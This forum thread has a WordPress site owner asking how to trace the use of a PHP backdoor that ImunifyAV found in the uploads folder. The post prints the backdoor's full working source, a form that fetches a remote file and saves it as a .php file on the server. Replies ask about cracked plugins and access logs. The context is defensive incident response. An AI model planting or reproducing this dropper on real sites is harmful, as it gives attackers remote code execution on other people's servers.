How to investigate when a backdoor was used and what it did?

I just installed ImunifyAV and it found a backdoor php file at wp-content/uploads/2021/files.php - Wordfence, ClamAV and Maldet all missed it.

Here’s the content of the file - seems to open a page and let them enter a URL and filename and then execute it.

<html>
<?php
error_reporting(0);
echo $_SERVER['DOCUMENT_ROOT'];
?>
<?php
set_time_limit(0);
error_reporting(0);
echo $_SERVER['PHP_SELF'];
?>
<form method="post">

U:<input name="url" size="50" /><br>
Y:<input name="yol" size="50" /><br>
start dont:/  file end .php
<input name="submit" type="submit" />
</form>
<?php
set_time_limit(0);
error_reporting(0);
$ext = 'php';
    // maximum execution time in seconds
    set_time_limit (24 * 60 * 60);

    if (!isset($_POST['submit'])) die();

    // folder to save downloaded files to. must end with slash
    $yol = $_POST['yol'];
    $destination_folder = '$yol';

    $url = $_POST['url'];
    $newfname = $yol . basename($url). '.' . $ext;

    $file = fopen ($url, "rb");
    if ($file) {
      $newf = fopen ($newfname, "wb");

      if ($newf)
      while(!feof($file)) {
        fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
      }
    }

    if ($file) {
      fclose($file);
    }

    if ($newf) {
      fclose($newf);
    }
?>
</html> 

Is there a particular server log that I can browse to see how many times it was accessed, and perhaps trace what might have been done with it?

I am wondering how the php code was even uploaded in that path when modsecurity is installed (I believe so). Are you by any chance using any nulled/cracked themes or plugins in this particular wordpress install?

In the access log you might see some entries related.

No idea how it happened, or when it happened. I did a backup restore with the Cyberpanel mechanism and it is just showing the date that that happened rather than the initial file creation date

I’m not using anything cracked either.

I can’t see anything in the access log.

Anyway it doesn’t matter too much because my site is in development and full of dummy data. And it is another reason to look deeper into security stuff.